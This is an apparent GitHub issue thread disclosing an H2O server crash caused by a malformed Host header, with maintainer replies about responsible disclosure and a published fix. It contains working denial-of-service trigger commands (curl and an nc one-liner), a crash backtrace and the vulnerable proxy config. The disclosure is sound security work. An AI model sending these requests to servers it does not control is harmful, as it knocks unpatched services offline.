Malformed HTTP/1.1 Request Causes Out Of Memory Error Within H2O Server With HTTP Backend (Zero Day) #3228
Comments
Thanks for reporting this issue. But as someone who administers several servers with H2O, I kindly ask you to follow the procedures for (responsibly) reporting security issues.
This was raised with the team but fell on deaf ears; responsible reporting was followed without a successful outcome.
@ElijahGlover I am disappointed that you opened this issue without proper coordination with us (e.g., notifying us that you would disclose the issue at a certain moment). We did inform you that we were aware of the issue, and had invited you as a collaborator for releasing the fix. FWIW we already have a fix which we will roll out pretty soon. PS. Regardless, thank you for noticing and reporting the bug.
The issue has been fixed in #3229, and a security advisory is available at GHSA-p5hj-phwj-hrvx. As stated in the advisory, we do not yet have a tagged version. Sorry for the inconvenience.
Thank you @kazuho for jumping on this defect quickly. I understand everyone is busy and resource constrained. Private disclosure was sent to the team at the very start of April 2023 to get this dealt with without issuing a public disclosure. Unfortunately, communications stalled because there is a disconnect between the H2O and Fastly SecOps teams. There are roughly 15k+ H2O servers (per Shodan) in the wild that are vulnerable to this issue. It is clear that attackers already know about this vulnerability, as whole networks are being targeted using this vector.
We have identified an issue in the h2o server where a malformed HTTP/1.1 request crashes the process, occasionally locking up child workers and causing a denial of service/outage that drops open connections.
The issue was first discovered in an older build of h2o from December 2022; a build compiled from the latest master branch as of March 2023 crashes in the same way.
We are terminating TLS and proxying HTTP to Varnish using a single TCP backend.
We are able to crash H2O with a simple curl command that sends a bare colon as the Host header:
curl 127.0.0.1 -H "host: :"
responds with curl: (52) Empty reply from server
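For reference, the same request can be reproduced without curl. The following is a minimal sketch assuming netcat is available and that the colon-only Host header value is the trigger (curl's exact request line and extra headers are omitted):
printf 'GET / HTTP/1.1\r\nHost: :\r\nConnection: close\r\n\r\n' | nc 127.0.0.1 80
As with the curl invocation, the server returns no response while the worker aborts.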
The H2O error log contains the following:
old worker 1805 died, status:0
old worker 1816 died, status:0
fatal:/h2o/include/h2o/memory.h:443:no memory
received fatal signal 6
[1930] h2o[0x52a038]
[1930] /lib64/libpthread.so.0(+0x12cf0)[0x7f1c80aaccf0] __restore_rt at ??:?
[1930] /lib64/libc.so.6(gsignal+0x10f)[0x7f1c80722aff] ?? ??:0
[1930] /lib64/libc.so.6(abort+0x127)[0x7f1c806f5ea5] ?? ??:0
[1930] h2o[0x478dda]
[1930] h2o[0x479175]
[1930] h2o(h2o_httpclient__h1_on_connect+0x221)[0x471d01]
[1930] h2o[0x47d360]
[1930] h2o[0x47d676]
[1930] h2o(h2o_evloop_run+0x37)[0x481c87]
[1930] h2o[0x52bbb1]
[1930] /lib64/libpthread.so.0(+0x81cf)[0x7f1c80aa21cf] start_thread at ??:?
[1930] /lib64/libc.so.6(clone+0x43)[0x7f1c8070de73] ?? ??:0
The config uses a very simple interface binding with one backend:
hosts:
  "<INTERFACE_IP>:80":
    listen: *clear_http
    paths:
      "/":
        proxy.reverse.url: http://127.0.0.2:8080/
        proxy.preserve-host: ON
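The *clear_http anchor referenced above is defined elsewhere in our configuration and is not shown here. For illustration only, a minimal standalone config along these lines (with an explicit listen block substituted for the anchor; port 80 is an assumption based on the host key) exercises the same proxy path:
hosts:
  "<INTERFACE_IP>:80":
    listen:
      port: 80  # stands in for the *clear_http anchor, whose definition is not shown in this report
    paths:
      "/":
        proxy.reverse.url: http://127.0.0.2:8080/
        proxy.preserve-host: ON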
We are building against the latest OpenSSL 3.1 libraries, although this does not look like an OpenSSL vulnerability. Judging from the backtrace (h2o_httpclient__h1_on_connect) and the codebase, the crash appears to happen while the backend HTTP request is being constructed inside the event loop.